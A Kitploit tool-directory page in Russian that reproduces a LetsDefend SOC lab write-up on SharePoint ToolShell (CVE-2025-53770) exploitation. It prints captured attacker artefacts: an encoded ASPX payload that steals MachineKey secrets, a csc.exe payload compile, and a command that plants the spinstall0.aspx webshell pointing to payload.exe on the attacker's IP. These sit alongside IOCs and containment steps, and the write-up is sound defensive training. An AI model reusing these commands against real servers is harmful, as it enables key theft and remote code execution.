Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — Подробный разбор эксплуатации уязвимости нулевого дня CVE-2025-53770 (ToolShell) в SharePoint, включая анализ RCE, эксфильтрацию MachineKey, компиляцию полезной нагрузки, развертывание веб-шелла и шаги по сдерживанию инцидента при реагировании на него. | Kitploit
Инструменты/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Управление индикаторами компрометации (IOC)Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийАнализ вредоносных программЦифровая криминалистикаТестирование на ПроникновениеРазведка угрозОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Реагирование на Инциденты
Лаборатории и Практика
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Подробный разбор эксплуатации уязвимости нулевого дня CVE-2025-53770 (ToolShell) в SharePoint, включая анализ RCE, эксфильтрацию MachineKey, компиляцию полезной нагрузки, развертывание веб-шелла и шаги по сдерживанию инцидента при реагировании на него.

Репозиторий
311 месяцев назадЕщё не проверено
Поделиться

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Введение

Я изучил zero-day уязвимость SharePoint под названием ToolShell (CVE-2025-53770) в лаборатории LetsDefend. Я воспроизвёл реальную zero-day атаку, в ходе которой вредоносный POST-запрос обошёл аутентификацию, запустил PowerShell для кражи ключей MachineKeySection, скомпилировал payload.exe и разместил веб-шелл (spinstall0.aspx). Я зафиксировал все действия, проанализировал поведение и изолировал хост. Этот README описывает процессы атаки, шаги по её нейтрализации и извлечённые уроки.

Обзор лаборатории

  • Платформа: LetsDefend Cyber Range
  • Цель: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • Задача: проанализировать RCE, отработать обнаружение и сдерживание

Используемые инструменты:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Декодер Base64
  • LetsDefend Threat Intel

Оповещение

image

Это критическое оповещение и подозрительная активность, нацеленная на ToolPane.aspx в MS SharePoint: большая полезная нагрузка и подделанный Referer. Контекст CVE связан с CVE-2025-53770. Это критическая уязвимость SharePoint, эксплуатируемая через специально сформированный POST-запрос, который позволял атакующим без аутентификации. Успешная эксплуатация привела к удалённому выполнению кода (RCE) на сервере. Я рассматривал это как активную угрозу высокой срочности и исходил из возможной успешной компрометации, пока не доказано обратное.

Что такое SharePoint

Microsoft SharePoint — это платформа для корпоративной совместной работы и управления документами: по сути, защищённый и организованный центр для файлов, рабочих процессов и внутренних веб-приложений.

Основное применение

  • Управление документами: контроль версий, журналы аудита и разрешения на файлы
  • Совместная работа: несколько пользователей могут совместно редактировать документы и обмениваться ими
  • Интранет / порталы: внутренние новости, кадровые политики, информационные панели
  • Рабочие процессы и автоматизация: формы, согласования и уведомления
  • Интеграция: подключается к Teams, Outlook, приложениям Office и Power BI

Вопросы безопасности SharePoint

  • Использует Active Directory или SSO для аутентификации
  • Данные шифруются в состоянии покоя и при передаче
  • Веб-части и макеты могут быть использованы во вред при неправильной настройке
  • Регулярная установка исправлений критически важна для защиты от zero-day эксплойтов

Что такое CVE-2025-53770 (ToolShell)

Критическая zero-day уязвимость в Microsoft SharePoint Server, позволяющая атакующим удалённо выполнять код без аутентификации. Она использует небезопасную десериализацию и часто комбинируется с другими уязвимостями SharePoint (CVE-2025-49704, CVE-2025-49706) для полного захвата системы. Оценена в 9.8 по CVSS (Critical) и активно эксплуатируется в дикой природе.

Анализ атаки с помощью VirusTotal

Я проанализировал IP-адрес отправителя (исходный IP-адрес) с помощью VirusTotal. Исходный IP-адрес: 107.191.58.76 image

Из этого видно, что 15/95 поставщиков безопасности пометили этот IP-адрес как вредоносный, что уже многое говорит об этом IP.

Геолокация IP

Теперь мне нужно определить местоположение IP. Это было сделано с помощью AbuseIPDB, и, как показано ниже, IP известен взломами, брутфорсом, атаками на веб-приложения, сканированием портов и отравлением DNS.

image

Анализ конечной точки

Как SOC-аналитик, решающий эту задачу, я понимал, что одним из важных шагов является анализ конечной точки. Я выполнил поиск хоста в Endpoint Security по имени «SharePoint01» и, поскольку этот IP известен взломами, продолжил дальнейший анализ.

image

После обнаружения хоста я открыл историю терминала, чтобы проверить командную строку.

image

| Командная строка из истории терминала

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

Флаги PowerShell: -nop -w hidden -e

  • -nop = No profile (без профиля — позволяет избежать выполнения скриптов профиля).
  • -w hidden = запуск окна скрытым (stealth).
  • -e = закодированная команда

Результаты анализа командной строки с помощью декодера Base64:

Учитывая наличие полезной нагрузки, я обратился к декодеру Base64, чтобы декодировать команду, как показано ниже.

image

Пользователь запустил powershell из системного каталога "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" и с помощью закодированных команд — серверный C#-скрипт ASP.NET.

  • Использует рефлексию для загрузки сборки System.Web,
  • Обращается к непубличному MachineKeySection и вызывает непубличный метод (GetApplicationConfig),
  • Считывает значения MachineKey веб-приложения (ValidationKey, DecryptionKey и т. д.),
  • Записывает эти ключи в HTTP-ответ (т. е. эксфильтрирует их).

Перехват полезных нагрузок и пост-эксплуатационные действия: / _layouts/15/ToolPane.aspx?...

Полезная нагрузка пытается прочитать и раскрыть ASP.NET MachineKey хоста — секрет, который можно использовать для подделки токенов ViewState/десериализации и обеспечения обхода аутентификации и удалённого выполнения кода. Это соответствует паттерну эксплуатации ToolShell (злоупотребление MachineKey).

Ключевые индикаторы компрометации (IoC) в команде, выявленные с помощью декодирования и кодирования Base64.

  • POST-запрос + большая полезная нагрузка + эта закодированная команда указывают на то, что атакующий, вероятно, пытался создать или выполнить такой серверный скрипт через путь эксплуатации ToolShell.
  • Раскрытие MachineKey и срабатывание оповещения: использование -encodedCommand + скрытого окна + полезной нагрузки в base64 указывает на обход средств обнаружения и автоматизированную эксплуатацию. Атакующие часто используют -encodedCommand, чтобы скрывать полезные нагрузки и избегать логирования командной строки; это позволяет атакующему создавать вредоносные View State или сериализованные полезные нагрузки, которые приложение принимает как допустимые, обеспечивая обход аутентификации и удалённое выполнение кода на уязвимых экземплярах SharePoint. Для ToolShell (CVE-2025-53770) это и есть цепочка эксплуатации.

Выполнение CMD и эксплуатация

Атакующий попытался получить доступ к приватной конфигурации и нацелился на эксплуатацию, злоупотребляя .NET. Из декодера Base64 видны System.Web.Configuration.MachineKeySection и GetApplicationConfig: MachineKeySection содержит:

  • ValidationKey машины/приложения
  • DecryptionKey машины/приложения.

Эти ключи — секреты, используемые для защиты viewstate и проверки подлинности форм (forms authentication). Их получение — это прямая попытка заполучить материал, позволяющий подделывать/проверять сериализованные ASP.NET-полезные нагрузки → прямое предусловие для RCE на основе десериализации.

Результаты анализа команд CMD:

Всего через ТРИ секунды после показанного выше атакующий отправил ещё одну команду.

image

| Командная строка из истории терминала

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

Выводы

  • Эта команда показывает компилятор C# (csc.exe), который поставляется с .NET Framework. Его задача — принимать исходный код (файлы .cs) и компилировать его в сборку .NET, обычно .exe или .dll.
  • Атакующий загрузил или создал исходный файл C# (payload.cs) на хосте жертвы, затем использовал встроенный компилятор .NET (csc.exe), чтобы скомпилировать его в исполняемый файл Windows (payload.exe). Это может быть вредоносная программа.

Ещё один результат анализа команд CMD:

Всего через ДВЕ секунды после показанного выше атакующий отправил ещё одну команду.

image

| Командная строка из истории терминала

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

Выводы

  • Атакующий использовал cmd.exe для создания нового ASPX-файла (spinstall0.aspx) в каталоге LAYOUTS внутри SharePoint, выведя HTML-форму/объект в этот путь.
  • Внедрённый ASPX содержит с Url="http://107.191.58.76/payload.exe", указывающим серверу или посетителю на эту удалённую полезную нагрузку.
  • Размещение файла в каталоге ...\TEMPLATE\LAYOUTS\ делает его доступным через веб-приложение SharePoint (постоянный бэкдор/дроппер, доступный через веб).
  • Это указывает на попытку удалённой доставки/выполнения payload.exe с контролируемого атакующим хоста (107.191.58.76) и является явным признаком компрометации и угрозы закрепления (persistence).
  • Ещё один результат анализа команд CMD:

    Всего через ПЯТЬ секунд после показанного выше атакующий отправил ещё одну команду.

    image

    | Командная строка из истории терминала

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

    Выводы

    • Снова выполнил PowerShell для вызова System.Web.Configuration.MachineKeySection.GetApplicationConfig(), который считывает конфигурацию MachineKey приложения.
    • Это извлекает ValidationKey/DecryptionKey, используемые для подписи/шифрования ViewState и токенов аутентификации, — материал, который атакующий может использовать для подделки сериализованных полезных нагрузок и обхода аутентификации.
    • Это явный последовательный шаг разведки/эксфильтрации в цепочке эксплуатации в стиле ToolShell (подготовка к RCE), который был выполнен вручную.

    Эта активность демонстрирует последовательный паттерн, поэтому я рассматриваю её как компрометацию с высокой степенью уверенности и немедленно собираю криминалистические артефакты.

    Разведка угроз (Threat Intel)

    После сбора всех команд и результатов анализа я провёл дополнительное исследование в threat intel и выполнил поиск по типу данных IP. Источник данных показывает OnlyHunt и тег CVE-2025-53770, а Referer: /_layouts/SignOut.aspx в канале расследования оповещений показывает, что это легитимный SharePoint, который был подделан или использован, после чего из SharePoint выполнили выход, чтобы создать видимость, будто действие исходит из обычного SharePoint. На этом этапе я изолировал хост.

    image

    IOC (Артефакты)

    • IP 107.191.58.76: исходный IP-адрес атакующего, наблюдавшийся при отправке эксплуатирующего POST-запроса
    • /_layouts/15/ToolPane.aspx?DisplayMode=Edit: тип «url». Конечная точка эксплуатации, на которую был направлен POST
    • Spinstall0.aspx: тип «filename». Имя файла развёрнутого вредоносного ASPX-бэкдора
    • MachineKeySection: тип «string». Строка ASPX-кода, указывающая на эксфильтрацию MachineKey

    Моя аналитическая заметка и сводка

    Аналитическая заметка — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01

    Дата/Время: 2025-07-2213:07 (событие) Аналитик: [Ваше имя] CaseID: SOC342 Хост: SharePoint01 Серьёзность: критическая

    Сводка

    Я обнаружил попытку эксплуатации критической zero-day уязвимости под названием ToolShell (CVE-2025-53770) 2025-07-22 в 13:07 на локальном (on-premises) сервере SharePoint с именем хоста SharePoint01. Атакующий, действуя с известного вредоносного IP (107.191.58.76), который является источником POST-запросов и хостом полезной нагрузки, обошёл аутентификацию, чтобы выполнить удалённый код на сервере. Атакующий загрузил/создал spinstall0.aspx в каталоге LAYOUTS SharePoint и выполнил PowerShell для чтения материала MachineKey ASP.NET, а также скомпилировал C#-полезную нагрузку через csc.exe. Это позволило ему создавать доверенные (trusted) полезные нагрузки. Эта деятельность согласуется с развёртыванием веб-шелла spinstall0.aspx в SharePoint, эксфильтрацией MachineKey и компиляцией полезной нагрузки на хосте — всё это индикаторы компрометации с высокой степенью уверенности.

    Обновление аналитической заметки в playbook

    image image

    Рекомендуемые шаги по нейтрализации действий атакующего:

    После обнаружения компрометации я рекомендовал в аналитической заметке предпринять следующие шаги:

    1. Сдерживание: при наличии полномочий изолировать SharePoint01 от сети; если нет — сохранять ограничения исходящего трафика и блокировать IP-адреса/кластеры атакующего.
    2. Поиск угроз: проверить весь SharePoint и убедиться в наличии надлежащих резервных копий.
    3. Устранение: удалить подтверждённые вредоносные файлы и любые несанкционированные запланированные задачи/службы; проверить наличие дополнительных механизмов закрепления.
    4. Смягчение: сменить значения ASP.NET/MachineKey и применить экстренные исправления Microsoft за июль 2025 года ко всем локальным (on-premises) экземплярам SharePoint. Согласовать смену ключей с владельцами приложений.
    5. Обнаружение и предотвращение: развернуть/добавить правила обнаружения и провести поиск аналогичной активности по всему окружению.
Скачать инструмент